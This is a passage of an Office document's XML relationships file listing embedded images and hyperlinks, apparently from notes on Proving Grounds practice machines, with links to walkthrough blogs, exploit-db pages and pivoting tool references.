Target="media/image502.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image495.png"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osintteam.blog/proving-grounds-sunsetdecoy-walkthrough-28108bcaecd9" TargetMode="External"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image252.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image302.png"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image323.png"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image552.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image296.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image255.png"/><Relationship Id="rId1270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@manhon.keung/proving-grounds-practice-linux-box-clue-c5d3a3b825d2" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://routezero.security/2025/02/18/proving-grounds-practice-wallpaperhub-walkthrough/" TargetMode="External"/><Relationship Id="rId1271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-69-proving-grounds-clue-91eb61a5af44" TargetMode="External"/><Relationship Id="rId681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image339.png"/><Relationship Id="rId1030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId1272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49362?source=post_page-----91eb61a5af44---------------------------------------" TargetMode="External"/><Relationship Id="rId680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image510.png"/><Relationship Id="rId1031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image304.png"/><Relationship Id="rId1273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47799" TargetMode="External"/><Relationship Id="rId1032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-exfiltrated-4c11efba893d" TargetMode="External"/><Relationship Id="rId1274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47799" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image414.png"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/glasgow-smile-1-proving-groundswalkthrough-521b2fee1317" TargetMode="External"/><Relationship Id="rId686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId1033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image523.png"/><Relationship Id="rId1275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/cassandra.html" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image535.png"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image265.png"/><Relationship Id="rId685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hxlxmj/%EF%B8%8F-spidersociety-a-full-walkthrough-395ed6cd13f4" TargetMode="External"/><Relationship Id="rId1034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId1276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://al1z4deh.medium.com/proving-grounds-fanatastic-b14a6e535e1f" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image550.png"/><Relationship Id="rId684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId1035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-exfiltrated-4c11efba893d" TargetMode="External"/><Relationship Id="rId1277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vk9-sec.com/disk-group-privilege-escalation" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@gayemans1003/offsec-proving-grounds-zab-walkthrough-4092a2c8c904" TargetMode="External"/><Relationship Id="rId1036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50911" TargetMode="External"/><Relationship Id="rId1278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId1026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image301.png"/><Relationship Id="rId1268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-bratarina-596deb95f8d9" TargetMode="External"/><Relationship Id="rId1027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image448.png"/><Relationship Id="rId1269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-69-proving-grounds-clue-91eb61a5af44" TargetMode="External"/><Relationship Id="rId1028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId1029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image481.png"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image541.png"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image418.png"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abyssal_bloom/proving-grounds-bitforge-walkthrough-oscp-9aeb4fed4080" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://h0j3n.medium.com/vulnhub-vegeta-1-0-fceb0b58aa83" TargetMode="External"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-nickel-f76b06f60db1" TargetMode="External"/><Relationship Id="rId676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId1260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image329.png"/><Relationship Id="rId1261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId1020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swapravo/polkadots" TargetMode="External"/><Relationship Id="rId1262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-21-proving-grounds-clamav-774a396d568b" TargetMode="External"/><Relationship Id="rId1021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/openssl/openssl" TargetMode="External"/><Relationship Id="rId1263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/4761" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/cybersploit-1-vulnhub-walkthrough-8537c7b71dcf" TargetMode="External"/><Relationship Id="rId675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@kism37/spx-offsecpg-walkthrough-765be7d9a717" TargetMode="External"/><Relationship Id="rId1022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/openssl/openssl" TargetMode="External"/><Relationship Id="rId1264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-pelican-walkthrough-72190462e821" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image253.png"/><Relationship Id="rId674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mu.aktepe18/spx-proving-ground-walk-through-57590e101bc2" TargetMode="External"/><Relationship Id="rId1023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Crypt_(C)" TargetMode="External"/><Relationship Id="rId1265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/offensive-security-walk-throughs/oscp-proving-ground-walkthrough-bratarina-e5b66dd4cc82" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-play-pwned1-walkthrough-651ce326d091" TargetMode="External"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image390.png"/><Relationship Id="rId1024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Crypt_(C)" TargetMode="External"/><Relationship Id="rId1266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/offensive-security-walk-throughs/oscp-proving-ground-walkthrough-bratarina-e5b66dd4cc82" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image467.png"/><Relationship Id="rId1025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId1267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/4798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